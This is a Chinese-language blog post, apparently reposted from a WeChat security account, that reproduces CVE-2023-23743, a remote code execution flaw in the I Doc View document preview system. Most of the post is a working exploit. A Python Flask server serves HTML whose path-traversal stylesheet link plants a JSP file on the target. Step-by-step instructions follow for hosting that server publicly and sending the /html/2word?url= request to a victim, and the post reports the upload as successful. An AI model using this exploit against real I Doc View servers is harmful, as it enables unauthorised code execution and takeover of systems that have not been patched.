[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行

admin 2023年12月17日00:57:25评论84 views字数 1247阅读4分9秒阅读模式

本人非原创漏洞作者,文章仅作为知识分享用

一切直接或间接由于本文所造成的后果与本人无关

如有侵权,联系删除

产品简介

I Doc View在线文档预览系统是一套用于在Web环境中展示和预览各种文档类型的系统,如文本文档、电子表格、演示文稿、PDF文件等。

开发语言:Java开发厂商:北京卓软在线信息技术有限公司

[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行

漏洞描述

I Doc View在线文档预览系统“/html/2word”的参数“url”存在文件上传漏洞,该漏洞存在于I Doc View的远程页面缓存功能中。由于应用程序无法完全验证用户输入URL的安全性,攻击者可以构建特殊的URL,使服务器下载恶意文件并执行任意代码。
影响版本

iDocView < 13.10.1_20231115

空间测绘

回复“CVE-2023-23743”获取空间测绘语句

漏洞利用
# python代码

from flask import Flaskimport argparse

parse = argparse.ArgumentParser()parse.add_argument("-port", type=int, help="Save port.", default=8989)args = parse.parse_args()

app = Flask(__name__)



@app.route('/index.html')def index():  return """<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">  <title>title</title>    <link rel="stylesheet" href="..\..\..\docview\aaaa.jsp"></head><body></body></html>"""



@app.route('/..\..\..\docview\aaaa.jsp')def jsp_file():  return '''<% out.print("This is a vul test!");%>'''



if __name__ == '__main__':  app.run(host="0.0.0.0", port=args.port)

# 利用POC

/html/2word?url=http://yyy.yyy.yyy:8989/index.html
  1. 在公网服务器运行python脚本
python poc.py -port 8989

[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行

2.向目标发送请求(xxx.xxx.xxx为目标公网IP或域名,yyy.yyy.yyy为服务器公网IP或域名)

http://xxx.xxx.xxx/html/2word?url=http://yyy.yyy.yyy:8989/index.html

[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行

服务器收到请求。

[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行

文件上传成功。

[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行

参考链接

https://buaq.net/go-199519.htmlhttps://zhuanlan.zhihu.com/p/668379259

原文始发于微信公众号(不够安全):[漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月17日00:57:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现]CVE-2023-23743 “I DOC View”远程代码执行http://cn-sec.com/archives/2302149.html

发表评论

匿名网友 填写信息